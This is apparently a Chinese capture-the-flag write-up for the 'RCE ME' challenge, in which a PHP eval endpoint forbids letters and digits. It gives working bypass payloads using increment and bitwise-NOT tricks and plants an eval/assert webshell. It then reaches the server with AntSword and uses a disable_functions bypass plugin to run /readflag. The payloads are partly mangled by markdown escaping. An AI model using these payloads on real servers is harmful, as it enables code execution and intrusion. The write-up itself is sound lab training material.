[极客大挑战 2019]RCE ME

python 复制代码
<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

这道题之前做过,命令注入,禁用了所有字母和数字,可以利用自增绕过,再做一遍。

_=(0/0)._;=_\[_\];_=++__;++;_=._;++;__++;++;_=_.__;++;_=_..__;_\[_\]($[__]);

但是长度超过40了。还有更好的办法吗?

看了一下别人的答案,可以用取反运算。

urlencode(~'_POST'); 得到%A0%AF%B0%AC%AB

然后上传code=_=\~%A0%AF%B0%AC%AB;_\[_\]($_[__]);

到服务端会自动进行url解码,得到的是不可见字符,经过取反运算后还原成_POST,就能进行命令执行。

然后尝试POST:_=system&__=ls /但是显示被禁用了。

于是通过**code=_=\~%8F%97%8F%96%91%99%90;_();**执行phpinfo():

可以看到有很多函数被禁用了,包括system

关于代码执行的一些逻辑梳理

eval(_POST\[0\])会将传入的_POST[0]字符串当作代码执行,但是如果是eval('echo 123;_POST\[0\]')就只会执行字符串'echo 123;_POST[0]',_POST\[0\]在里面只是一个变量,并不是可执行代码,只有像'echo 123;eval(_POST[0]);'才能正确植入木马。因此我们植入的木马必须是_POST\[0\](_POST[1]),该语句是动态函数调用语句,是可执行代码,这时候可以赋值0=assert,同样也会执行_POST\[1\]中表达式,只不过在较新版本php中有些限制,因此我们可以利用1=eval(_POST[3])然后蚁剑链接3即可。不能直接赋值0=eval因为eval不是函数不能用于动态函数调用。

system被禁用了怎么办呢,可以利用GET传入_=assert&__=eval($_POST[0]),然后用蚁剑链接0,这里因为有很多函数禁用(其实蚁剑的本质就是自动注入代码),我们需要下载一个插件绕过这些禁用函数。

利用echo urlencode(~'_GET');得到%A0%B8%BA%AB,然后尝试:

?code=_=\~%A0%B8%BA%AB;_\[_\](_\[__\]);\&_=assert\&__=eval(_POST[0])

可以看到成功了 。

然后用蚁剑链接,链接成功后我们可以看到根目录下的flag文件但是看不到具体内容。需要下载插件绕过禁用函数。

具体流程就是下载"绕过disable_founcs"插件然后加载插件,选择PHP7-GC-UAF模式,开始后在命令行运行/readflag就能拿到flag。

但是PHP7-GC-UAF模式是干什么的?readflag程序又是什么?

不同模式代表不同的绕过方法,可以根据phpinfo中的配置信息选择合适的模式(也可以一个个试),这里我们可以看到使用的是php7版本,所以选择PHP7-GC-UAF可以成功,当然还有其他的模式可选。

readflag是靶机设计者设置的 flag 获取入口,我们需要执行该命令以获取flag。

总结:这道题考察禁用了字母和数字的命令执行,之前使用的方法是自增绕过,但是这里限定了长度,所以只能使用另外两种方法,取反和异或。我使用的是取反,异或的原理也类似:

111^101=010相当于是取反。另外url编码是将字符的ascii码由八位二进制转换为两位十六进制数,再加上百分号。因此%FF解码后的二进制字符串就是全1的数,因此我们可以利用%FF%FF%FF%FF^%A0%B8%BA%AB得到_GET。

另外这道题涉及绕过disable_functions

disable_functions 是 PHP 配置文件(php.ini)中的一个安全设置项,用于禁止指定的 PHP 函数执行,从而限制脚本的操作权限,降低安全风险。

我使用的是最简便的方法--利用蚁剑插件。

相关推荐
ZZHow10247 小时前
Java项目-苍穹外卖_Day1
java·spring boot·web
带刺的坐椅8 小时前
老码农教你 Solon Web Context-Path 的两种配置方式
java·nginx·tomcat·web·solon
ZZHow10248 小时前
Java项目-苍穹外卖_Day2
java·spring boot·web
mosan12312 小时前
【数据安全竞赛】BUUCTF·[Dest0g3 520迎新赛]StrangeTraffic
ctf·流量分析·数据安全竞赛
huluang3 天前
i春秋CTF实战:破解Crypto ezxor谜题,从异或迷阵到Flag重现
ctf
OEC小胖胖3 天前
【React 设计模式】受控与非受控:解构 React 组件设计的核心模式
前端·react.js·设计模式·前端框架·web
蒋星熠3 天前
全栈开发:从LAMP到云原生的技术革命
微服务·云原生·职场和发展·架构·系统架构·web·devops
诗人不说梦^5 天前
[NCTF2019]True XML cookbook
web·ctf
hui函数5 天前
Flask-WTF表单验证全攻略
后端·python·flask·web·表单验证
OEC小胖胖6 天前
【React Hooks】封装的艺术:如何编写高质量的 React 自-定义 Hooks
前端·react.js·前端框架·web